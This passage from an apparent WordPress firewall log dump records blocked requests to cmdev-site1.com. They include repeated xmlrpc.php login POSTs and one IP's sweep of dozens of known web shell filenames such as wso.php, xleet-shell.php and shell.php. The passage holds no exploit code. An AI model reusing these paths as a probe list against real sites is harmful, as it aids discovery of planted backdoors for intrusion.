Firefox\\/1.0.6\"}','Uf3z1IpHGcoAmQ6EP87VulSD',0,1681919844.0883,558,'','POST',403,0,515,0,1,'',0),('80.237.3.97',1357710177,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','VGCBU83JmTznwZXjHfrg9ODW',0,1681919846.8432,566,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','U42XKb60mSzQZqk1WLgoM8nu',0,1681919848.5870,562,'','POST',403,0,515,0,1,'',0),('5.23.50.207',85406415,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','OLBtqxVDzdbC9eHhEw4kP1aI',0,1681919859.9227,598,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','PJTFxets4HM67vWInf8drD03',0,1681919867.9361,575,'','POST',403,0,515,0,1,'',0),('185.141.215.15',3113080591,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','ILvJzSrjDRhw1UtXnTOg9y6u',0,1681919868.7092,561,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','FoRBwYpJt2aZf7uzQcrX9GmH',0,1681919873.6952,592,'','POST',403,0,515,0,1,'',0),('185.98.5.232',3110209000,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','p4ZnqLwKusQ9lCghm7jbHTeR',0,1681919875.1779,568,'','POST',403,0,515,0,1,'',0),('192.241.158.94',3237060190,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','cQukdX7fAKOwSH9t13DEWYTs',0,1681919880.8729,567,'','POST',403,0,515,0,1,'',0),('172.105.163.59',2892604219,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','ncCRgJpFrSYdXHMvL3BijQuP',0,1681919888.7187,571,'','POST',403,0,515,0,1,'',0),('54.191.137.17',918522129,'','http://cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\"}','zD3c54SpEjl2LuArXJk9wiWV',0,1681919891.4511,428,'','GET',404,0,600,0,1,'',0),('54.191.137.17',918522129,'','http://cmdev-site1.com/wp-login.php?bypass_wpem=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','joVGSbWiKYCUguwaQrPReAtd',0,1681919893.1608,390,'','GET',404,0,600,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/Makhdamx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','oxa5veT1JZ9Sk6MgLBcCRtXy',0,1681920328.2271,291,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/database.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','gfkmjXcVEMS4Aeu1Qo83DndN',0,1681920329.5376,292,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','zHCZwr5kG34ahoRSx9uKM6OF',0,1681920330.8965,306,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','SNLCUlckBHf30OjoPim2a9F1',0,1681920332.7383,310,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/xltavrat.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','OFriBnmb5AZLJhPEtWkesQcg',0,1681920334.0997,303,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','jAhGPqBO8gQ9JxiKplwYcFrH',0,1681920335.3665,295,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-content/plugins/seoplugins/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','pRH2xyoM18VcWaNXtf3Er6Je',0,1681920336.8505,341,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wso112233.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','wr9SCQOavk2UpzsgRf7bBM4H',0,1681920338.3075,319,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/xleet-shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','kBPpgCNJdyvMbHDKf3cUl1GX',0,1681920339.8492,289,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','qcg70WSzyMtX1afCjpxukHAL',0,1681920341.1017,296,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','jfQP9MTpKLsz4cA1tGYIvnCa',0,1681920342.8685,326,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','nBPk4CwRKTgQ9JSEYmjFu8zt',0,1681920344.1748,306,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-admin/js/widgets/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','ivB5esVLMHk649CmFo8nt71R',0,1681920345.6197,305,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/0z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','cWtvlyJXE86hF0AsUp5B9wxH',0,1681920347.0130,297,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','bSuLwXrxlFOVQ1Bes8ZhiUEP',0,1681920348.2097,391,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','wUj8bXq0ft7SZoC32diIVnFJ',0,1681920349.6350,326,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','bwkrCDpeE0hzSR8gyKxHmZO7',0,1681920351.1190,303,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','QghqnifFOSaZdXNolLI2DAxK',0,1681920352.8350,282,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','LusXzkxiab1lQ3veEOM4Zpht',0,1681920354.1758,289,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/alwso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','t2cOCU4duNvpoBFD7fnxSAie',0,1681920355.5145,292,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','4IPfvx10QEOYKGzDZdFR9asl',0,1681920356.9629,284,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','RMqoITmwtQKbGJEZCUaz4DBP',0,1681920358.2067,315,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/templates/beez5/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','Yl2suXVEkyh8LbZUdcaGNMKx',0,1681920359.5472,311,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','7fu3jtxsnKIX1cQyBgr5vPCD',0,1681920360.8491,293,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','0TpPiUbu3stNOMGx8jzK1fvg',0,1681920362.6179,413,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','y6QUVRzftqYK14gChJDnSuAe',0,1681920364.0315,367,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','qEb8T3aH2r7KZhCBn5fIFY9L',0,1681920365.6152,302,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','Ivd1BrRViDNu4zHyFJ7ChSXm',0,1681920367.1346,303,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','HN82DMewWqcJduivrsfC1zZA',0,1681920368.5897,327,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/sh.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','L4SMTbYIElcOwhi8ZzPq2kfJ',0,1681920369.9091,294,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','SrI3jVGeJZTnxNMp71qbDRa2',0,1681920371.2620,429,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','C37EKXmtWYZs92LcoRDjbPpe',0,1681920373.1910,278,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','VOJeY4ZKWaqlxd0S16RCgHwU',0,1681920374.4316,295,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','0mGdWuN5p3FZkJyUwhtsjgT8',0,1681920375.7628,304,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','4v20KrJThdm6OxEVP3aYC9Bj',0,1681920377.1370,341,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','ub1YClHazVB8o5IxJg2LKiPO',0,1681920378.4394,291,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','9f2J0znhu1Uxr46dWjokE8wC',0,1681920379.7751,303,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/mari.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','gwC2szOQeALKq01d3r6ENfBh',0,1681920381.2506,307,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','jdrbvHCA758hY0QSK6Xeyzgm',0,1681920383.0353,297,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','7ziamg9BQuDKfdw0LxVeqTR8',0,1681920384.3331,283,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','dsjSzgxJbF3IiMtnky0YCwO7',0,1681920385.8790,297,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','0GF1z5NeRXIpctKCg6dnY43i',0,1681920387.1248,285,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','ZgUoPyI5nSHli4Ff7WhCVG8J',0,1681920388.8164,301,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','3NJQg8aT1ImuzUi6DpHtPFkc',0,1681920390.0907,305,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','ZOiU7vDAPaIxc4zqXu6dY1ke',0,1681920391.4907,326,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','ZlRduAe4UcyBmih3nz5N18Cv',0,1681920392.9020,300,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wso2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','3mAEROU8QNixjrdSKeTGy1fs',0,1681920394.2384,299,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-content/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','k9bxCGp2OqQ81ogMf6VwAHYy',0,1681920395.8043,305,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/uploads/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','kbB2mnAzDjG5fQXNwLPUFrEq',0,1681920397.1279,372,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','sDNwk2yq6Qtx4peHhP3Xo8mG',0,1681920398.5046,312,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','d75vWtzfjigD23uE1ZeqYOkr',0,1681920400.0338,325,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/date.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','2dlHjsv0pVErfTLMUAGFcqKD',0,1681920401.3868,315,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','cpuWJfZiCPTw4kSnU9omFby7',0,1681920403.1892,302,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','lt2pLFUonQ8D376Nx0qSsHkC',0,1681920404.4966,311,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','H4SIpX9bVzxjn3ydKQNthkBv',0,1681920405.9216,285,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/01.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','We9ypUCAxXq4EVPlmoush5L8',0,1681920407.3496,613,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','9F36fNlkGHZvrbKa4cuLdOI2',0,1681920409.0856,785,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-admin/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','tlFYsW43oRgHNKrP1VBykEmC',0,1681920410.9592,315,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','EUNmr36PGv4hsMYVF5W8liwt',0,1681920412.9420,304,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','zS53d9kLQJt8iFPToGZW4X6p',0,1681920414.0733,413,'','GET',404,0,515,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','7JgnMis48TpqNOXCIyjdfH5l',0,1681920415.6854,772,'','GET',403,0,700,0,1,'',0),('213.152.161.5',3583549701,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zMqiG1NyRfYpSXnbCKH2UwP9',0,1681920415.7449,1099,'','POST',403,0,515,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-content/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','ZLjGK3bcXsCkxNoVMPAuWhlF',0,1681920417.4690,312,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','QfUeOxFqCwnR01AbW8sNGz5D',0,1681920418.7967,325,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','NZJu7X3IkWTS1DBRP8MshpEK',0,1681920420.2252,355,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/wp-includes/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','5b2mVKfPL1cQkTOEBJdyizpx',0,1681920421.8631,557,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','d2kQiwL5DIeG1PqCYNx0Va6l',0,1681920423.9467,824,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','u862cG9YX5Arl0JwOvezNUbk',0,1681920425.9691,519,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','pubRYflKwAsh4zVoCL6k8v7q',0,1681920427.5797,323,'','GET',403,0,700,0,1,'',0),('103.241.64.155',1743863963,'','http://cmdev-site1.com/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 